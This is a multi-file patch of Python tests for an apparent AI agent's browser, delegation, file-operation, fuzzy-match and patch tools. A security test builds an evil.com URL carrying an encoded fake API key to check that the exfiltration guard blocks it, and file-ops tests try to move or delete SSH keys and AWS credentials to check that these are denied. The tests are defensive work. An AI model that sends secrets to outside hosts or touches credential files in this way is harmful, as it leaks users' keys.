def test_not_found_cached_raises_on_subsequent(self):
|
||||
"""After FileNotFoundError, subsequent calls should raise from cache."""
|
||||
import tools.browser_tool as bt
|
||||
from pathlib import Path
|
||||
|
||||
original_exists = Path.exists
|
||||
|
||||
def mock_exists(self):
|
||||
if "node_modules" in str(self) and "agent-browser" in str(self):
|
||||
return False
|
||||
return original_exists(self)
|
||||
|
||||
with patch("shutil.which", return_value=None), \
|
||||
patch("os.path.isdir", return_value=False), \
|
||||
patch.object(Path, "exists", mock_exists):
|
||||
with pytest.raises(FileNotFoundError):
|
||||
bt._find_agent_browser()
|
||||
# Second call should also raise (from cache)
|
||||
with pytest.raises(FileNotFoundError, match="cached"):
|
||||
bt._find_agent_browser()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _get_command_timeout
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCommandTimeoutCache:
|
||||
|
||||
def test_default_is_30(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
with patch("hermes_cli.config.read_raw_config", return_value={}):
|
||||
assert _get_command_timeout() == 30
|
||||
|
||||
def test_reads_from_config(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
cfg = {"browser": {"command_timeout": 60}}
|
||||
with patch("hermes_cli.config.read_raw_config", return_value=cfg):
|
||||
assert _get_command_timeout() == 60
|
||||
|
||||
def test_cached_after_first_call(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}})
|
||||
with patch("hermes_cli.config.read_raw_config", mock_read):
|
||||
_get_command_timeout()
|
||||
_get_command_timeout()
|
||||
mock_read.assert_called_once()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _discover_homebrew_node_dirs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestHomebrewNodeDirsCache:
|
||||
|
||||
def test_lru_cached(self):
|
||||
from tools.browser_tool import _discover_homebrew_node_dirs
|
||||
assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \
|
||||
"_discover_homebrew_node_dirs should be decorated with lru_cache"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Security: URL-decoded secret check
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestUrlDecodedSecretCheck:
|
||||
"""Verify that URL-encoded API keys are caught by the exfiltration guard."""
|
||||
|
||||
def test_encoded_key_blocked_in_navigate(self):
|
||||
"""browser_navigate should block URLs with percent-encoded API keys."""
|
||||
import urllib.parse
|
||||
from tools.browser_tool import browser_navigate
|
||||
import json
|
||||
|
||||
# URL-encode a fake secret prefix that matches _PREFIX_RE
|
||||
encoded = urllib.parse.quote("sk-ant-fake123")
|
||||
url = f"https://evil.com?key={encoded}"
|
||||
|
||||
result = json.loads(browser_navigate(url, task_id="test"))
|
||||
assert result["success"] is False
|
||||
assert "API key" in result["error"] or "Blocked" in result["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Thread safety: _recording_sessions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestRecordingSessionsThreadSafety:
|
||||
"""Verify _recording_sessions is accessed under _cleanup_lock."""
|
||||
|
||||
def test_start_recording_uses_lock(self):
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._maybe_start_recording)
|
||||
assert "_cleanup_lock" in src, \
|
||||
"_maybe_start_recording should use _cleanup_lock to protect _recording_sessions"
|
||||
|
||||
def test_stop_recording_uses_lock(self):
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._maybe_stop_recording)
|
||||
assert "_cleanup_lock" in src, \
|
||||
"_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions"
|
||||
|
||||
def test_emergency_cleanup_clears_under_lock(self):
|
||||
"""_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._emergency_cleanup_all_sessions)
|
||||
# Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside
|
||||
lock_pos = src.find("_cleanup_lock")
|
||||
clear_pos = src.find("_recording_sessions.clear()")
|
||||
assert lock_pos != -1 and clear_pos != -1
|
||||
assert lock_pos < clear_pos, \
|
||||
"_recording_sessions.clear() should come after _cleanup_lock context manager"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Structure-aware _truncate_snapshot
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestTruncateSnapshot:
|
||||
|
||||
def test_short_snapshot_unchanged(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]'
|
||||
assert _truncate_snapshot(short) == short
|
||||
|
||||
def test_long_snapshot_truncated_at_line_boundary(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
# Create a snapshot that exceeds 8000 chars
|
||||
lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)]
|
||||
snapshot = "\n".join(lines)
|
||||
assert len(snapshot) > 8000
|
||||
|
||||
result = _truncate_snapshot(snapshot, max_chars=200)
|
||||
assert len(result) <= 300 # some margin for the truncation note
|
||||
assert "truncated" in result.lower()
|
||||
# Every line in the result should be complete (not cut mid-element)
|
||||
for line in result.split("\n"):
|
||||
if line.strip() and "truncated" not in line.lower():
|
||||
assert line.startswith("- item") or line == ""
|
||||
|
||||
def test_truncation_reports_remaining_count(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
lines = [f"- line {i}" for i in range(100)]
|
||||
snapshot = "\n".join(lines)
|
||||
result = _truncate_snapshot(snapshot, max_chars=200)
|
||||
# Should mention how many lines were truncated
|
||||
assert "more line" in result.lower()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Scroll optimization
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestScrollOptimization:
|
||||
|
||||
def test_agent_browser_path_uses_pixel_scroll(self):
|
||||
"""Verify agent-browser path uses single pixel-based scroll, not 5x loop."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt.browser_scroll)
|
||||
assert "_SCROLL_PIXELS" in src, \
|
||||
"browser_scroll should use _SCROLL_PIXELS for agent-browser path"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Empty stdout = failure
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEmptyStdoutFailure:
|
||||
|
||||
def test_empty_stdout_returns_failure(self):
|
||||
"""Verify _run_browser_command returns failure on empty stdout."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._run_browser_command)
|
||||
assert "returned no output" in src, \
|
||||
"_run_browser_command should treat empty stdout as failure"
|
||||
|
||||
def test_empty_ok_commands_is_module_level_frozenset(self):
|
||||
"""_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function."""
|
||||
import tools.browser_tool as bt
|
||||
assert hasattr(bt, "_EMPTY_OK_COMMANDS")
|
||||
assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset)
|
||||
assert "close" in bt._EMPTY_OK_COMMANDS
|
||||
assert "record" in bt._EMPTY_OK_COMMANDS
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _camofox_eval bug fix
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCamofoxEvalFix:
|
||||
|
||||
def test_uses_correct_ensure_tab_signature(self):
|
||||
"""_camofox_eval should pass task_id string to _ensure_tab, not a session dict."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._camofox_eval)
|
||||
# Should NOT call _get_session at all — _ensure_tab handles it
|
||||
assert "_get_session" not in src, \
|
||||
"_camofox_eval should not call _get_session (removed unused import)"
|
||||
# Should use body= not json_data=
|
||||
assert "json_data=" not in src, \
|
||||
"_camofox_eval should use body= kwarg for _post, not json_data="
|
||||
assert "body=" in src
|
||||
@@ -15,6 +15,19 @@ from tools.browser_tool import (
|
||||
_SANE_PATH,
|
||||
check_browser_requirements,
|
||||
)
|
||||
import tools.browser_tool as _bt
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_browser_caches():
|
||||
"""Clear lru_cache and manual caches between tests."""
|
||||
_discover_homebrew_node_dirs.cache_clear()
|
||||
_bt._cached_agent_browser = None
|
||||
_bt._agent_browser_resolved = False
|
||||
yield
|
||||
_discover_homebrew_node_dirs.cache_clear()
|
||||
_bt._cached_agent_browser = None
|
||||
_bt._agent_browser_resolved = False
|
||||
|
||||
|
||||
class TestSanePath:
|
||||
@@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs:
|
||||
def test_returns_empty_when_no_homebrew(self):
|
||||
"""Non-macOS systems without /opt/homebrew/opt should return empty."""
|
||||
with patch("os.path.isdir", return_value=False):
|
||||
assert _discover_homebrew_node_dirs() == []
|
||||
assert _discover_homebrew_node_dirs() == ()
|
||||
|
||||
def test_finds_versioned_node_dirs(self):
|
||||
"""Should discover node@20/bin, node@24/bin etc."""
|
||||
@@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs:
|
||||
with patch("os.path.isdir", return_value=True), \
|
||||
patch("os.listdir", return_value=["node"]):
|
||||
result = _discover_homebrew_node_dirs()
|
||||
assert result == []
|
||||
assert result == ()
|
||||
|
||||
def test_handles_oserror_gracefully(self):
|
||||
"""Should return empty list if listdir raises OSError."""
|
||||
with patch("os.path.isdir", return_value=True), \
|
||||
patch("os.listdir", side_effect=OSError("Permission denied")):
|
||||
assert _discover_homebrew_node_dirs() == []
|
||||
assert _discover_homebrew_node_dirs() == ()
|
||||
|
||||
|
||||
class TestFindAgentBrowser:
|
||||
|
||||
@@ -13,13 +13,14 @@ import json
|
||||
import os
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import unittest
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from tools.delegate_tool import (
|
||||
DELEGATE_BLOCKED_TOOLS,
|
||||
DELEGATE_TASK_SCHEMA,
|
||||
MAX_CONCURRENT_CHILDREN,
|
||||
_get_max_concurrent_children,
|
||||
MAX_DEPTH,
|
||||
check_delegate_requirements,
|
||||
delegate_task,
|
||||
@@ -66,7 +67,7 @@ class TestDelegateRequirements(unittest.TestCase):
|
||||
self.assertIn("context", props)
|
||||
self.assertIn("toolsets", props)
|
||||
self.assertIn("max_iterations", props)
|
||||
self.assertEqual(props["tasks"]["maxItems"], 3)
|
||||
self.assertNotIn("maxItems", props["tasks"]) # removed — limit is now runtime-configurable
|
||||
|
||||
|
||||
class TestChildSystemPrompt(unittest.TestCase):
|
||||
@@ -167,10 +168,13 @@ class TestDelegateTask(unittest.TestCase):
|
||||
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
|
||||
}
|
||||
parent = _make_mock_parent()
|
||||
tasks = [{"goal": f"Task {i}"} for i in range(5)]
|
||||
limit = _get_max_concurrent_children()
|
||||
tasks = [{"goal": f"Task {i}"} for i in range(limit + 2)]
|
||||
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
|
||||
# Should only run 3 tasks (MAX_CONCURRENT_CHILDREN)
|
||||
self.assertEqual(mock_run.call_count, 3)
|
||||
# Should return an error instead of silently truncating
|
||||
self.assertIn("error", result)
|
||||
self.assertIn("Too many tasks", result["error"])
|
||||
mock_run.assert_not_called()
|
||||
|
||||
@patch("tools.delegate_tool._run_single_child")
|
||||
def test_batch_ignores_toplevel_goal(self, mock_run):
|
||||
@@ -561,7 +565,7 @@ class TestBlockedTools(unittest.TestCase):
|
||||
self.assertIn(tool, DELEGATE_BLOCKED_TOOLS)
|
||||
|
||||
def test_constants(self):
|
||||
self.assertEqual(MAX_CONCURRENT_CHILDREN, 3)
|
||||
self.assertEqual(_get_max_concurrent_children(), 3)
|
||||
self.assertEqual(MAX_DEPTH, 2)
|
||||
|
||||
|
||||
@@ -1052,5 +1056,159 @@ class TestChildCredentialLeasing(unittest.TestCase):
|
||||
child._credential_pool.release_lease.assert_called_once_with("cred-a")
|
||||
|
||||
|
||||
class TestDelegateHeartbeat(unittest.TestCase):
|
||||
"""Heartbeat propagates child activity to parent during delegation.
|
||||
|
||||
Without the heartbeat, the gateway inactivity timeout fires because the
|
||||
parent's _last_activity_ts freezes when delegate_task starts.
|
||||
"""
|
||||
|
||||
def test_heartbeat_touches_parent_activity_during_child_run(self):
|
||||
"""Parent's _touch_activity is called while child.run_conversation blocks."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": "terminal",
|
||||
"api_call_count": 3,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "executing tool: terminal",
|
||||
}
|
||||
|
||||
# Make run_conversation block long enough for heartbeats to fire
|
||||
def slow_run(**kwargs):
|
||||
time.sleep(0.25)
|
||||
return {"final_response": "done", "completed": True, "api_calls": 3}
|
||||
|
||||
child.run_conversation.side_effect = slow_run
|
||||
|
||||
# Patch the heartbeat interval to fire quickly
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test heartbeat",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
# Heartbeat should have fired at least once during the 0.25s sleep
|
||||
self.assertGreater(len(touch_calls), 0,
|
||||
"Heartbeat did not propagate activity to parent")
|
||||
# Verify the description includes child's current tool detail
|
||||
self.assertTrue(
|
||||
any("terminal" in desc for desc in touch_calls),
|
||||
f"Heartbeat descriptions should include child tool info: {touch_calls}")
|
||||
|
||||
def test_heartbeat_stops_after_child_completes(self):
|
||||
"""Heartbeat thread is cleaned up when the child finishes."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": None,
|
||||
"api_call_count": 1,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "done",
|
||||
}
|
||||
child.run_conversation.return_value = {
|
||||
"final_response": "done", "completed": True, "api_calls": 1,
|
||||
}
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test cleanup",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
# Record count after completion, wait, and verify no more calls
|
||||
count_after = len(touch_calls)
|
||||
time.sleep(0.15)
|
||||
self.assertEqual(len(touch_calls), count_after,
|
||||
"Heartbeat continued firing after child completed")
|
||||
|
||||
def test_heartbeat_stops_after_child_error(self):
|
||||
"""Heartbeat thread is cleaned up even when the child raises."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": "web_search",
|
||||
"api_call_count": 2,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "executing tool: web_search",
|
||||
}
|
||||
|
||||
def slow_fail(**kwargs):
|
||||
time.sleep(0.15)
|
||||
raise RuntimeError("network timeout")
|
||||
|
||||
child.run_conversation.side_effect = slow_fail
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
result = _run_single_child(
|
||||
task_index=0,
|
||||
goal="Test error cleanup",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
self.assertEqual(result["status"], "error")
|
||||
|
||||
# Verify heartbeat stopped
|
||||
count_after = len(touch_calls)
|
||||
time.sleep(0.15)
|
||||
self.assertEqual(len(touch_calls), count_after,
|
||||
"Heartbeat continued firing after child error")
|
||||
|
||||
def test_heartbeat_includes_child_activity_desc_when_no_tool(self):
|
||||
"""When child has no current_tool, heartbeat uses last_activity_desc."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": None,
|
||||
"api_call_count": 5,
|
||||
"max_iterations": 90,
|
||||
"last_activity_desc": "API call #5 completed",
|
||||
}
|
||||
|
||||
def slow_run(**kwargs):
|
||||
time.sleep(0.15)
|
||||
return {"final_response": "done", "completed": True, "api_calls": 5}
|
||||
|
||||
child.run_conversation.side_effect = slow_run
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test desc fallback",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
self.assertGreater(len(touch_calls), 0)
|
||||
self.assertTrue(
|
||||
any("API call #5 completed" in desc for desc in touch_calls),
|
||||
f"Heartbeat should include last_activity_desc: {touch_calls}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
|
||||
@@ -333,3 +333,25 @@ class TestShellFileOpsWriteDenied:
|
||||
result = file_ops.patch_replace("~/.ssh/authorized_keys", "old", "new")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_delete_file_denied_path(self, file_ops):
|
||||
result = file_ops.delete_file("~/.ssh/authorized_keys")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_src_denied(self, file_ops):
|
||||
result = file_ops.move_file("~/.ssh/id_rsa", "/tmp/dest.txt")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_dst_denied(self, file_ops):
|
||||
result = file_ops.move_file("/tmp/src.txt", "~/.aws/credentials")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_failure_path(self, mock_env):
|
||||
mock_env.execute.return_value = {"output": "No such file or directory", "returncode": 1}
|
||||
ops = ShellFileOperations(mock_env)
|
||||
result = ops.move_file("/tmp/nonexistent.txt", "/tmp/dest.txt")
|
||||
assert result.error is not None
|
||||
assert "Failed to move" in result.error
|
||||
|
||||
@@ -6,31 +6,31 @@ from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
class TestExactMatch:
|
||||
def test_single_replacement(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "hi world"
|
||||
|
||||
def test_no_match(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "xyz", "abc")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "xyz", "abc")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
assert new == content
|
||||
|
||||
def test_empty_old_string(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "", "x")
|
||||
new, count, _, err = fuzzy_find_and_replace("abc", "", "x")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
|
||||
def test_identical_strings(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "abc", "abc")
|
||||
new, count, _, err = fuzzy_find_and_replace("abc", "abc", "abc")
|
||||
assert count == 0
|
||||
assert "identical" in err
|
||||
|
||||
def test_multiline_exact(self):
|
||||
content = "line1\nline2\nline3"
|
||||
new, count, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "replaced\nline3"
|
||||
@@ -39,7 +39,7 @@ class TestExactMatch:
|
||||
class TestWhitespaceDifference:
|
||||
def test_extra_spaces_match(self):
|
||||
content = "def foo( x, y ):"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
@@ -47,7 +47,7 @@ class TestWhitespaceDifference:
|
||||
class TestIndentDifference:
|
||||
def test_different_indentation(self):
|
||||
content = " def foo():\n pass"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
@@ -55,13 +55,96 @@ class TestIndentDifference:
|
||||
class TestReplaceAll:
|
||||
def test_multiple_matches_without_flag_errors(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
|
||||
assert count == 0
|
||||
assert "Found 2 matches" in err
|
||||
|
||||
def test_multiple_matches_with_flag(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
|
||||
assert err is None
|
||||
assert count == 2
|
||||
assert new == "ccc bbb ccc"
|
||||
|
||||
|
||||
class TestUnicodeNormalized:
|
||||
"""Tests for the unicode_normalized strategy (Bug 5)."""
|
||||
|
||||
def test_em_dash_matched(self):
|
||||
"""Em-dash in content should match ASCII '--' in pattern."""
|
||||
content = "return value\u2014fallback"
|
||||
new, count, strategy, err = fuzzy_find_and_replace(
|
||||
content, "return value--fallback", "return value or fallback"
|
||||
)
|
||||
assert count == 1, f"Expected match via unicode_normalized, got err={err}"
|
||||
assert strategy == "unicode_normalized"
|
||||
assert "return value or fallback" in new
|
||||
|
||||
def test_smart_quotes_matched(self):
|
||||
"""Smart double quotes in content should match straight quotes in pattern."""
|
||||
content = 'print(\u201chello\u201d)'
|
||||
new, count, strategy, err = fuzzy_find_and_replace(
|
||||
content, 'print("hello")', 'print("world")'
|
||||
)
|
||||
assert count == 1, f"Expected match via unicode_normalized, got err={err}"
|
||||
assert "world" in new
|
||||
|
||||
def test_no_unicode_skips_strategy(self):
|
||||
"""When content and pattern have no Unicode variants, strategy is skipped."""
|
||||
content = "hello world"
|
||||
# Should match via exact, not unicode_normalized
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
assert count == 1
|
||||
assert strategy == "exact"
|
||||
|
||||
|
||||
class TestBlockAnchorThreshold:
|
||||
"""Tests for the raised block_anchor threshold (Bug 4)."""
|
||||
|
||||
def test_high_similarity_matches(self):
|
||||
"""A block with >50% middle similarity should match."""
|
||||
content = "def foo():\n x = 1\n y = 2\n return x + y\n"
|
||||
pattern = "def foo():\n x = 1\n y = 9\n return x + y"
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, pattern, "def foo():\n return 0\n")
|
||||
# Should match via block_anchor or earlier strategy
|
||||
assert count == 1
|
||||
|
||||
def test_completely_different_middle_does_not_match(self):
|
||||
"""A block where only first+last lines match but middle is completely different
|
||||
should NOT match under the raised 0.50 threshold."""
|
||||
content = (
|
||||
"class Foo:\n"
|
||||
" completely = 'unrelated'\n"
|
||||
" content = 'here'\n"
|
||||
" nothing = 'in common'\n"
|
||||
" pass\n"
|
||||
)
|
||||
# Pattern has same first/last lines but completely different middle
|
||||
pattern = (
|
||||
"class Foo:\n"
|
||||
" x = 1\n"
|
||||
" y = 2\n"
|
||||
" z = 3\n"
|
||||
" pass"
|
||||
)
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, pattern, "replaced")
|
||||
# With threshold=0.50, this near-zero-similarity middle should not match
|
||||
assert count == 0, (
|
||||
f"Block with unrelated middle should not match under threshold=0.50, "
|
||||
f"but matched via strategy={strategy}"
|
||||
)
|
||||
|
||||
|
||||
class TestStrategyNameSurfaced:
|
||||
"""Tests for the strategy name in the 4-tuple return (Bug 6)."""
|
||||
|
||||
def test_exact_strategy_name(self):
|
||||
new, count, strategy, err = fuzzy_find_and_replace("hello", "hello", "world")
|
||||
assert strategy == "exact"
|
||||
assert count == 1
|
||||
|
||||
def test_failed_match_returns_none_strategy(self):
|
||||
new, count, strategy, err = fuzzy_find_and_replace("hello", "xyz", "world")
|
||||
assert count == 0
|
||||
assert strategy is None
|
||||
assert err is not None
|
||||
|
||||
@@ -104,6 +104,45 @@ class TestStdioPidTracking:
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
def test_kill_orphaned_uses_sigkill_when_available(self, monkeypatch):
|
||||
"""Unix-like platforms should keep using SIGKILL for orphan cleanup."""
|
||||
from tools.mcp_tool import _kill_orphaned_mcp_children, _stdio_pids, _lock
|
||||
|
||||
fake_pid = 424242
|
||||
with _lock:
|
||||
_stdio_pids.clear()
|
||||
_stdio_pids.add(fake_pid)
|
||||
|
||||
fake_sigkill = 9
|
||||
monkeypatch.setattr(signal, "SIGKILL", fake_sigkill, raising=False)
|
||||
|
||||
with patch("tools.mcp_tool.os.kill") as mock_kill:
|
||||
_kill_orphaned_mcp_children()
|
||||
|
||||
mock_kill.assert_called_once_with(fake_pid, fake_sigkill)
|
||||
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
def test_kill_orphaned_falls_back_without_sigkill(self, monkeypatch):
|
||||
"""Windows-like signal modules without SIGKILL should fall back to SIGTERM."""
|
||||
from tools.mcp_tool import _kill_orphaned_mcp_children, _stdio_pids, _lock
|
||||
|
||||
fake_pid = 434343
|
||||
with _lock:
|
||||
_stdio_pids.clear()
|
||||
_stdio_pids.add(fake_pid)
|
||||
|
||||
monkeypatch.delattr(signal, "SIGKILL", raising=False)
|
||||
|
||||
with patch("tools.mcp_tool.os.kill") as mock_kill:
|
||||
_kill_orphaned_mcp_children()
|
||||
|
||||
mock_kill.assert_called_once_with(fake_pid, signal.SIGTERM)
|
||||
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fix 3: MCP reload timeout (cli.py)
|
||||
|
||||
@@ -159,7 +159,7 @@ class TestApplyUpdate:
|
||||
def __init__(self):
|
||||
self.written = None
|
||||
|
||||
def read_file(self, path, offset=1, limit=500):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content=(
|
||||
'def run():\n'
|
||||
@@ -211,7 +211,7 @@ class TestAdditionOnlyHunks:
|
||||
# Apply to a file that contains the context hint
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="def main():\n pass\n",
|
||||
error=None,
|
||||
@@ -239,7 +239,7 @@ class TestAdditionOnlyHunks:
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="existing = True\n",
|
||||
error=None,
|
||||
@@ -253,3 +253,259 @@ class TestAdditionOnlyHunks:
|
||||
assert result.success is True
|
||||
assert file_ops.written.endswith("def new_func():\n return True\n")
|
||||
assert "existing = True" in file_ops.written
|
||||
|
||||
|
||||
class TestReadFileRaw:
|
||||
"""Bug 1 regression tests — files > 2000 lines and lines > 2000 chars."""
|
||||
|
||||
def test_apply_update_file_over_2000_lines(self):
|
||||
"""A hunk targeting line 2200 must not truncate the file to 2000 lines."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: big.py
|
||||
@@ marker_at_2200 @@
|
||||
line_2200
|
||||
-old_value
|
||||
+new_value
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
# Build a 2500-line file; the hunk targets a region at line 2200
|
||||
lines = [f"line_{i}" for i in range(1, 2501)]
|
||||
lines[2199] = "line_2200" # index 2199 = line 2200
|
||||
lines[2200] = "old_value"
|
||||
file_content = "\n".join(lines)
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content=file_content, error=None)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
written_lines = file_ops.written.split("\n")
|
||||
assert len(written_lines) == 2500, (
|
||||
f"Expected 2500 lines, got {len(written_lines)}"
|
||||
)
|
||||
assert "new_value" in file_ops.written
|
||||
assert "old_value" not in file_ops.written
|
||||
|
||||
def test_apply_update_preserves_long_lines(self):
|
||||
"""A line > 2000 chars must be preserved verbatim after an unrelated hunk."""
|
||||
long_line = "x" * 3000
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: wide.py
|
||||
@@ short_func @@
|
||||
def short_func():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
file_content = f"def short_func():\n return 1\n{long_line}\n"
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content=file_content, error=None)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
